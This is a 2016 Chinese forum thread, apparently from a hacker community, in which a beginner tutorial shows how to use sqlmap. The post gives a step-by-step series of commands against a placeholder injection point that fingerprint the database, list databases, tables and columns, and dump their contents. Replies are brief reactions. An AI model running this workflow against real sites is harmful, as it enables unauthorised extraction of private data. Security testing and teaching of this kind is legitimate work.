安子超 发表于 2016-1-10 22:53:56

菜鸟如何使用SQLMAP

以下内容可能会对大牛造成恶心、眩晕等不良反应。关闭该页面即可好转

      SQLMAP是一个自动注入化工具 运行在Python 2.7 环境有具有很强跨平台性、无图形界面

1.
   使用快捷方式启动

2.
   现做如下假设   
                           1. 已经安装Python2.7 并已经添加了环境变量
                           2. 已经下载了SQLMAP
                           3. 会使用cmd命令行
                                                      我知道你们都是大牛
3.
   打开要在sqlmap的目录里


注入点 、绝对不要做坏事 我们是白帽黑阔 这已经提交补天了


**************************************


sqlmap.py -u "注入点" //会判断数据库类型,服务操作系统、脚本类型 前后有双引号



03服务器 / asp.net / ms sql 2008


sqlmap.py -u "注入点" --dbs //列数据库 按上键






sqlmap.py -u "注入点" -D 数据库名 --tables//列出表名





sqlmap.py -u "注入点" -D 数据库名 -T 表名 --columns//猜字段




sqlmap.py -u "注入点" -D 数据库名 -T 表名 -C "字段名2,字段名2” --dump //获得字符、段内容



小圈圈 发表于 2016-1-11 08:57:47

我不是大牛@_@

haowozao 发表于 2016-1-11 09:28:08

完全看不懂的说

蓝颜 发表于 2016-1-11 14:31:08

哪里恶心头疼了http://www.ihonker.org//mobcent//app/data/phiz/default/38.png

caizi 发表于 2016-1-11 17:12:02

不错不错,终于学会了

雨僧 发表于 2016-1-12 14:36:44

只是一些非常初级的东西,详细的推荐大家去freebuf

Mrlin 发表于 2016-1-13 12:23:53

飘零 发表于 2016-2-12 10:28:47

觉得很好呢
页: [1]
查看完整版本: 菜鸟如何使用SQLMAP